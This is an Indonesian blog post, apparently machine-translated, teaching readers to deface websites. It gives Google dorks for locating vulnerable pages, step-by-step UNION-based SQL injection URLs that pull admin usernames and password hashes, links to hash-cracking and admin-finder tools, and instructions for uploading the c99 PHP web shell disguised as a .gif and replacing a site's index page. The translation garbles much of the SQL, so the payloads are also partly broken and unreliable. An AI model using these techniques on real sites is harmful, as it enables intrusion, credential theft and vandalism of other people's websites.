Spo iler:CARA MERUSAK WEBSITE MENGGUNAKAN SQL DAN SCRIPTING PHP


Spo
iler:CARA MERUSAK WEBSITE MENGGUNAKAN SQL DAN SCRIPTING PHP
Posting kali ini mengenai bagaimana cara merusak website menggunakan SQL dan Scripting PHP, Sebelumnya tutorial ini hanya untuk pelajaran semata bagi para pemuda bangsa ini. Dan Lombok_Creck84 tidak bertanggung jawab atas semua resiko dari pelajaran tutorial ini !!!

Sekarang mari kita diskusi kan “Bagaimana sebuah Website dapat di rusak menggunakan injeksi SQL dan kode PHP Scripting shell” Hari ini saya akan menunjukkan cara kerja 100% untuk Hacking Website dan kemudian merusak website mereka …

PERTAMA SEMUA ANDA HARUS TAHU APA dan bagaimana cara perusakan?

Mengotori website hanya berarti bahwa kita ganti file index.html dari sebuah situs oleh file kita. Sekarang semua Pengguna yang membukanya akan melihat Penulis Page (yaitu di-upload olehPenulis).
: Untuk mengotori sebuah situs web, tiga hal yang harus Anda ketahui:

1. SQL Injection (Untuk menganalisis loop website)
2. Admin Password
3. Shell Script (untuk mendapatkan Admin Controls)

Pertama-tama saya akan mengatakan bahwa saya telah mengambil beberapa bagian dari SQL injection Tutorial dari posting saya sebelumnya dan situs http //www.creck84.com Sebagian besar Bagian ini ditulis oleh saya jadi jika Anda memiliki keraguan Aku akan membersihkan mereka ….

1. Menemukan Target dan Password Admin
Pertama-tama kita harus mengetahui apakah situs target nya. Saya telah mengumpulkan banyak dari Dorks yaitu poin kerentanan dari situs web. Beberapa Pencarian Google dapat awesomely digunakan untuk mencari tahu Website yang rentan ….Berikut ini adalah contoh dari beberapa pertanyaan ..
Contoh: Buka Google dan copy paste pertanyaan ini …

inurl:index.php?id=

inurl:trainers.php?id

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=
Berikut adalah beberapa Query (menggunakannya tanpa tanda kutip) ..

“add.asp?bookid=”
“add_cart.asp?num=”
“addcart.asp?”
“addItem.asp”
“add-to-cart.asp?ID=”
“addToCart.asp?idProduct=”
“addtomylist.asp?ProdId=”
“adminEditProductFields.asp?intProdID=”
“advSearch_h.asp?idCategory=” 
“affiliate.asp?ID=” 
“affiliate-agreement.cfm?storeid=” 
“affiliates.asp?id=” 
“ancillary.asp?ID=”
“archive.asp?id=” 
“article.asp?id=” 
“aspx?PageID”
“basket.asp?id=” 
“Book.asp?bookID=” 
“book_list.asp?bookid=”
“book_view.asp?bookid=” 
“BookDetails.asp?ID=”
“browse.asp?catid=” 
“browse_item_details.asp” 
“Browse_Item_Details.asp?Store_Id=” 
“buy.asp?” 
“buy.asp?bookid=”
“bycategory.asp?id=” 
“cardinfo.asp?card=”
“cart.asp?action=” 
“cart.asp?cart_id=” 
“cart.asp?id=” 
“cart_additem.asp?id=” 
“cart_validate.asp?id=” 
“cartadd.asp?id=”
“cat.asp?iCat=” 
“catalog.asp”
“catalog.asp?CatalogID=” 
“catalog_item.asp?ID=”
“catalog_main.asp?catid=”
“category.asp” “Category.asp”
“category.asp?catid=”
“category_list.asp?id=”
“categorydisplay.asp?catid
“checkout.asp?cartid=”
“checkout.asp?UserID=”
“checkout_confirmed.asp?order_id=”
“checkout1.asp?cartid=”
“comersus_listCategoriesAndProducts.asp?idCategory =” “”
“comersus_optEmailToFriendForm.asp?idProduct=”
“comersus_optReviewReadExec.asp?idProduct=”
“comersus_viewItem.asp?idProduct=”
“comments_form.asp?ID=”
“contact.asp?cartId=”
“content.asp?id=”
“customerService.asp?TextID1=”
“default.asp?catID=”
“description.asp?bookid=”
“details.asp?BookID=” “details.asp?Press_Release_ID=” “details.asp?Product_ID=”
“details.asp?Service_ID=”
“display_item.asp?id=”
“displayproducts.asp”
“downloadTrial.asp?intProdID=” 
“emailproduct.asp?itemid=”
“emailToFriend.asp?idProduct=”
“events.asp?ID=”
“faq.asp?cartID=”
“faq_list.asp?id=”
“faqs.asp?id=”
“feedback.asp?title=”
“freedownload.asp?bookid=”
“fullDisplay.asp?item=”
“getbook.asp?bookid=”
“GetItems.asp?itemid=”
“giftDetail.asp?id=”
“help.asp?CartId=”
“home.asp?id=”
“index.asp?cart=”
“index.asp?cartID=”
“index.asp?ID=”
“info.asp?ID=”
“item.asp?eid=”
“item.asp?item_id=”
“item.asp?itemid=”
“item.asp?model=”
“item.asp?prodtype=”
“item.asp?shopcd=”
“item_details.asp?catid=”
“item_list.asp?maingroup”
“item_show.asp?code_no=”
“itemDesc.asp?CartId=”
“itemdetail.asp?item=”
“itemdetails.asp?catalogid=”
“learnmore.asp?cartID=”
“links.asp?catid=”
“list.asp?bookid=”
“List.asp?CatID=”
“listcategoriesandproducts.asp?idCategory=”
“modline.asp?id=”
“myaccount.asp?catid=”
“news.asp?id=”
“order.asp?BookID=”
“order.asp?id=”
“order.asp?item_ID=”
“OrderForm.asp?Cart=”
“page.asp?PartID=”
“payment.asp?CartID=”
“pdetail.asp?item_id=”
“powersearch.asp?CartId=”
“price.asp” “Price.asp”
“privacy.asp?cartID=”
“prodbycat.asp?intCatalogID=”
“prodetails.asp?prodid=”
“prodlist.asp?catid=”
“product.asp?bookID=”
“product.asp?intProdID=”
“product_info.asp?item_id=”
“productDetails.asp?idProduct=”
“productDisplay.asp”
“productinfo.asp?item=”
“productlist.asp?ViewType=Category&CategoryID= ” “productpage.asp” ]
“products.asp?ID
“products.asp?keyword=”
“products_category.asp?CategoryID=” “products_detail.asp?CategoryID=” “productsByCategory.asp?intCatalogID=”
“prodView.asp?idProduct=”
“promo.asp?id=”
“promotion.asp?catid=”
“pview.asp?Item=”
“resellers.asp?idCategory=”
“results.asp?cat=” “
“savecart.asp?CartId=”
“search.asp?CartID=”
“searchcat.asp?search_id=”
“Select_Item.asp?id=”
“Services.asp?ID=”
“shippinginfo.asp?CartId=”
“shop.asp?a=”
“shop.asp?action=” “
“shop.asp?bookid=”
“shop.asp?cartID=”
“shop_details.asp?prodid=”
“shopaddtocart.asp”
“shopaddtocart.asp?catalogid=”
“shopbasket.asp?bookid=”
“shopbycategory.asp?catid=”
“shopcart.asp?title=”
“shopcreatorder.asp”
“shopcurrency.asp?cid=”
“shopdc.asp?bookid=”
“shopdisplaycategories.asp”
“shopdisplayproduct.asp?catalogid=”
“shopdisplayproducts.asp”
“shopexd.asp”
“shopexd.asp?catalogid=”
“shopping_basket.asp?cartID=”
“shopprojectlogin.asp”
“shopquery.asp?catalogid=”
“shopremoveitem.asp?cartid=”
“shopreviewadd.asp?id=”
“shopreviewlist.asp?id=”
“ShopSearch.asp?CategoryID=”
“shoptellafriend.asp?id=”
“shopthanks.asp”
“shopwelcome.asp?title=”
“show_item.asp?id=”
“show_item_details.asp?item_id=”
“showbook.asp?bookid=”
“showStore.asp?catID=”
“shprodde.asp?SKU=”
“specials.asp?id=”
“store.asp?id=”
“store_bycat.asp?id=”
“store_listing.asp?id=”
“Store_ViewProducts.asp?Cat=”
“store-details.asp?id=”
“storefront.asp?id=”
“storefronts.asp?title=”
“storeitem.asp?item=”
“StoreRedirect.asp?ID=”
“subcategories.asp?id=”
“tek9.asp?”
“template.asp?Action=Item&pid=”
“tuangou.asp?bookid=”
“type.asp?iType=”
“updatebasket.asp?bookid=”
“updates.asp?ID=”
“view.asp?cid=”
“view_cart.asp?title=”
“view_detail.asp?ID=”
“viewcart.asp?CartId=” 
“viewCat_h.asp?idCategory=”
“viewevent.asp?EventID=”
“viewitem.asp?recor=”
“viewPrd.asp?idcategory=”
“ViewProduct.asp?misc=”
“voteList.asp?item_ID=”
“whatsnew.asp?idCategory=”
“WsAncillary.asp?ID “
Sekarang Hacking Password Admin prosedur dimulai:

juga dapat merujuk ke posting saya sebelumnya situs hacking:

1). Periksa kerentanan
Katakanlah kita memiliki beberapa situs seperti ini
http://www.site.com/news.php?id=5

Sekarang untuk menguji apakah adalah vulrnable kita menambahkan ke akhir url ‘(kutipan), dan yang akanhttp://www.site.com/news.php?id=5 

jadi jika kita mendapatkan beberapa error seperti
“Anda memiliki kesalahan dalam sintaks SQL Anda, periksa manual yang sesuai dengan versi MySQL server anda untuk dll benar ..”
atau sesuatu yang serupa yang berarti Situs rentan terhadap SQL injection.

2). Tentukan jumlah kolom

Untuk menemukan jumlah kolom kita menggunakan pernyataan ORDER BY (menceritakan database cara memesan hasilnya) jadi bagaimana menggunakannya? Yah hanya incrementing nomor sampai kita mendapatkan error.

http://www.site.com/news.php?id=5 order oleh / * <1 – tidak ada kesalahan

http://www.site.com/news.php?id=5 order oleh / * <2 – tidak ada kesalahan

http://www.site.com/news.php?id=5 order oleh / *❤ – tidak ada kesalahan

http://www.site.com/news.php?id=5 order by 4 / <* – error (kita mendapatkan pesan seperti ini Unknown kolom ’4 ‘order clause’ dalam ‘atau sesuatu seperti itu)

yang berarti bahwa ia memiliki 3 kolom, karena kita punya kesalahan pada tanggal 4.

3. Periksa fungsi UNION

Dengan serikat kita dapat memilih lebih banyak data dalam satu pernyataan sql.

Jadi kita harus

http://www.site.com/news.php?id=5 serikat semua pilih 1,2,3 / * (kita telah menemukan bahwa jumlah kolom adalah 3 di bagian 2). ) )

jika kita melihat beberapa nomor di layar, yaitu 1 atau 2 atau 3 maka UNION bekerja.

4). Periksa versi MySQL

http://www.site.com/news.php?id=5 serikat semua 1,2,3 pilih / CATATAN *: jika / * tidak bekerja atau Anda mendapatkan beberapa error, kemudian coba –
itu komentar dan sangat penting bagi query kita untuk bekerja dengan baik.

Mari kita berkata, bahwa kita nomor 2 di layar, sekarang untuk memeriksa versi kita ganti nomor 2 dengan @ @ version atau versi () dan mendapatkan someting seperti 4.1.33-log atau 5.0.45 atau mirip.

select 1,@@version,3/* seharusnya terlihat seperti ini http://www.site.com/news.php?id=5 serikat semua 1 pilih, @ @ version, 3 / *

Jika Anda mendapatkan error “union + campuran ilegal collations (IMPLISIT + yg dpt dipaksa) …”

Aku tidak melihat semua kertas yang mencakup masalah ini, jadi saya harus menulisnya.

Apa yang kita butuhkan adalah mengkonversi () fungsi

yaitu

http://www.site.com/news.php?id=5 serikat semua 1 pilih, convert (@ @ versi dengan menggunakan latin1), 3 / *

atau dengan hex () dan unhex ()

yaitu

http://www.site.com/news.php?id=5

pilih semua @ version)) pilih 1, unhex (hex (@, 3 / *

dan Anda akan mendapatkan versi MySQL.

5). Mendapatkan nama tabel dan kolom

baik jika versi MySQL adalah <5 (yaitu 4.1.33, 4.1.12 …) — kemudian i <akan menjelaskan untuk MySQL versi> 5.
kita harus menebak table dan nama kolom dalam banyak kasus.

nama tabel umum adalah: user / s, admin / s, member / s …

nama kolom umum adalah: username, user, usr, user_name, password, pass, passwd, pwd dan lain-lain ..

yaitu akan

http://www.site.com/news.php?id=5 serikat semua 1,2,3 pilih dari admin / * (kita lihat nomor 2 pada layar seperti sebelumnya, dan itu bagus)

Kita tahu bahwa meja admin ada …

Sekarang untuk memeriksa nama kolom.

http://www.site.com/news.php?id=5 serikat semua 1 pilih, username, 3 dari admin / * (jika anda mendapatkan error, kemudian coba nama kolom lainnya)

kita mendapatkan username ditampilkan di layar, misalnya akan menjadi admin, atau superadmin dll ..

sekarang untuk memeriksa apakah ada kolom password

http://www.site.com/news.php?id=5 serikat semua 1 pilih, password, 3 dari admin / * (jika anda mendapatkan error, kemudian coba nama kolom lainnya)

kita melihat password pada layar di hash atau plain-text, itu tergantung dari bagaimana database diatur
yaitu md5 hash, mysql hash, sha1 …

Sekarang kita harus menyelesaikan query untuk melihat bagus

Untuk itu kita dapat menggunakan concat () fungsi (itu bergabung string)

yaitu
http://www.site.com/news.php?id=5 serikat semua 1, pilih concat (username, 0x3a, password), 3 dari admin / *

Catatan saya yang menempatkan 0x3a, nilai hex nya untuk: (jadi 0x3a adalah nilai hex untuk usus besar)

(Ada cara lain untuk itu, char (58), nilai ASCII untuk:)

http://www.site.com/news.php?id=5 serikat semua 1, pilih concat (username, (58), password char), 3 dari admin / *

Sekarang kita mendapatkan dislayed username: assword p pada layar, yaitu admin: admin: somehash atau admin

Bila Anda memiliki ini, Anda bisa login seperti admin atau superuser beberapa.

Jika tidak bisa menebak nama tabel yang tepat, Anda selalu dapat mencoba mysql.user (default)

Ini memiliki kolom password user, jadi contoh akan

http://www.site.com/news.php?id=5 serikat semua 1, pilih concat (user, 0x3a, password), 3 dari mysql.user / *

6). MySQL 5

Seperti saya bilang sebelum aku akan menjelaskan bagaimana untuk mendapatkan dan kolom nama tabel di MySQL> 5.

Untuk ini kita perlu information_schema. Ini memegang semua tabel dan kolom dalam database.

untuk mendapatkan tabel kita menggunakan nama_tabel dan information_schema.tables.

yaitu

http://www.site.com/news.php?id=5 serikat semua 1 pilih, nama_tabel, 3 dari information_schema.tables / *

di sini kita mengganti nomor kita 2 dengan nama_tabel untuk mendapatkan tabel pertama dari information_schema.tables

Sekarang kita harus menambahkan LIMIT di akhir query untuk daftar semua tabel.

yaitu

http://www.site.com/news.php?id=5 serikat semua 1 pilih, nama_tabel, 3 dari information_schema.tables limit 0,1 / *

perhatikan bahwa saya menempatkan 0,1 (memperoleh 1 hasil, dimulai dari 0)

sekarang untuk melihat tabel kedua, kita mengubah batas 0,1 untuk membatasi 1,1

yaitu

http://www.site.com/news.php?id=5 serikat semua 1 pilih, nama_tabel, 3 dari information_schema.tables limit 1,1 / *

tabel kedua ditampilkan.

untuk tabel ketiga kami menempatkan batas 2,1

yaitu

http://www.site.com/news.php?id=5 serikat semua 1 pilih, nama_tabel, 3 dari information_schema.tables limit 2,1 / *

Simpan incrementing sampai Anda mendapatkan beberapa yang berguna seperti db_admin, poll_user, auth, auth_user dll ..

Untuk mendapatkan nama kolom metode adalah sama.

columns di sini kita menggunakan nama_kolom dan information_schema.columns

metode yang sama seperti di atas maka contoh akan

http://www.site.com/news.php?id=5 serikat semua 1 pilih, nama_kolom, 3 dari information_schema.columns limit 0,1 / *

Kolom pertama adalah diplayed.

Yang kedua (kita mengubah batas 0,1 untuk membatasi 1,1) yaitu.

http://www.site.com/news.php?id=5 serikat semua 1 pilih, nama_kolom, 3 dari information_schema.columns limit 1,1 / *

Kolom kedua ditampilkan, jadi tetap incrementing sampai Anda mendapatkan sesuatu seperti

username, user, login, password, pass, dll passwd ..

Jika Anda ingin menampilkan nama kolom untuk tabel khusus gunakan query ini.

Mari kita katakan bahwa kami menemukan pengguna meja.

yaitu

http://www.site.com/news.php?id=5 serikat semua 1 pilih, nama_kolom, 3 dari information_schema.columns mana nama_tabel = ‘user’ / *

Sekarang kita bisa ditampilkan nama kolom dalam tabel pengguna. Just using LIMIT we can list all columns in table users. Hanya menggunakan LIMIT kita bisa daftar semua kolom dalam tabel pengguna.

Perhatikan bahwa ini tidak akan bekerja jika tanda kutip ajaib ON.

Mari kita berkata, bahwa kita menemukan colums user, pass dan email.

Sekarang untuk menyelesaikan query untuk menempatkan mereka semua bersama-sama.

Untuk itu kita menggunakan concat (), saya jelaskan sebelumnya.

yaitu

http://www.site.com/news.php?id=5 serikat semua 1, pilih concat (user, 0x3a, pass, 0x3a, email) dari pengguna /

Apa yang kita dapatkan di sini adalah pemakai: ass p: email dari pengguna meja.

Contoh: admin: hash: whatever@blabla.com

Jika Anda terlalu malas untuk melakukan hal-hal di atas Anda dapat menggunakan tools mereka akan melakukan semua pekerjaan:

1) scanner Exploit (ini akan menemukan website rentan)
Code: Kode:
http://rapidshare.com/files/24802790…oitscanner.zip
http://rapidshare.com/files/248027905/exploitscanner.zip
2) SQLi helpper (alat ini akan melakukan semua pekerjaan penyuntikan dan membuat Anda mendapatkan lulus atau hash)
Code: Kode:
http://rapidshare.com/files/24802907…elperV.2.7.rar http://rapidshare.com/files/248029073/SQLIHelperV.2.7.rar
*** Menggunakan alat hanya jika anda baru hacking. Lakukan manual thats sensasi hacking dan yang nyata. Bila Anda melakukannya secara manual Anda akan memahami konsep ini.

Dalam beberapa website Anda langsung dapat melihat sandi tetapi sebagian besar situs mengenkripsi mereka menggunakan MD5. jadi u hav untuk memecahkan hash untuk mendapatkan password.

Untuk memecahkan sandi tersebut terdapat tiga cara
Periksa apakah bersih hash ini adalah retak sebelumnya:
Download: http://www.md5decrypter.co.ukhttp://www.md5decrypter.co.uk/&rurl=translate.google.co.id&usg=ALkJrhgDR3gfieScdIHZi_UH05YFrFVxVA

2) Crack password dengan bantuan situs:
Download:
http://www.milw0rm.com/cracker/insert.php
hhttp://www.milw0rm.com/cracker/insert.php&rurl=translate.google.co.id&usg=ALkJrhhLWNqffSgqmP1XEDOPslTSC0Id1g
http://passcracking.com/index.php
http://passcracking.com/index.php&rurl=translate.google.co.id&usg=ALkJrhgP-BXTHfis03tV61oH2Yau67HC6Q
3) Gunakan MD5 cracking software:
Download:
http://rapidshare.com/files/13696796…CF_2.10_2b.rar
http://rapidshare.com/files/136967969/a_MD5CF_2.10_2b.rar
Password = OwlsNest

2) mengotori WEBSITE

Setelah mendapatkan password Anda bisa login sebagai admin situs. Tapi pertama-tama anda harus menemukan halaman login admin untuk situs. ada tiga metode untuk menemukan panel admin.

1) Anda dapat menggunakan website finder admin:
Kode:
http://4dm1n.houbysoft.com/http://4dm1n.houbysoft.com/&rurl=translate.google.co.id&usg=ALkJrhi1UoaORjbk4AvVKN3xSyCme7eICg
2) Anda dapat menggunakan perangkat lunak finder admin:

Kode:
http://rapidshare.com/files/248020485/adminfinder.rar

Setelah log in sebagai admin Anda dapat meng-upload foto ke situs. jadi sekarang Anda akan meng-upload sebuah shell ke dalam situs dengan menggunakan fasilitas upload ini.

Dowload shell di sini:
http://rapidshare.com/files/248023722/c99.rar
http://rapidshare.com/files/248023722/c99.rar
Ekstrak itu Anda akan mendapatkan c99.php upload itu.
Beberapa situs wont memungkinkan Anda untuk meng-upload file php. sehingga nama itu sebagai c99.php.gif
Kemudian upload.

Setelah itu pergi ke http://www.site.com/images (di sebagian besar situs gambar akan disimpan dalam direktori ini, tetapi jika Anda tidak dapat menemukan C99 ada maka Anda harus menebak dir)

menemukan c99.php.gif dan klik ..

Sekarang Anda dapat melihat Pannel kontrol besar ….
Sekarang Anda dapat melakukan apa yang ingin Anda lakukan …
Cari file index.html dan menggantinya dengan file Anda sendiri.
Jadi, jika ada orang masuk ke situs yang mereka akan melihat halaman Anda ….

Setelah Melakukan ini klik pada Logout dan Anda Selesai ..

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s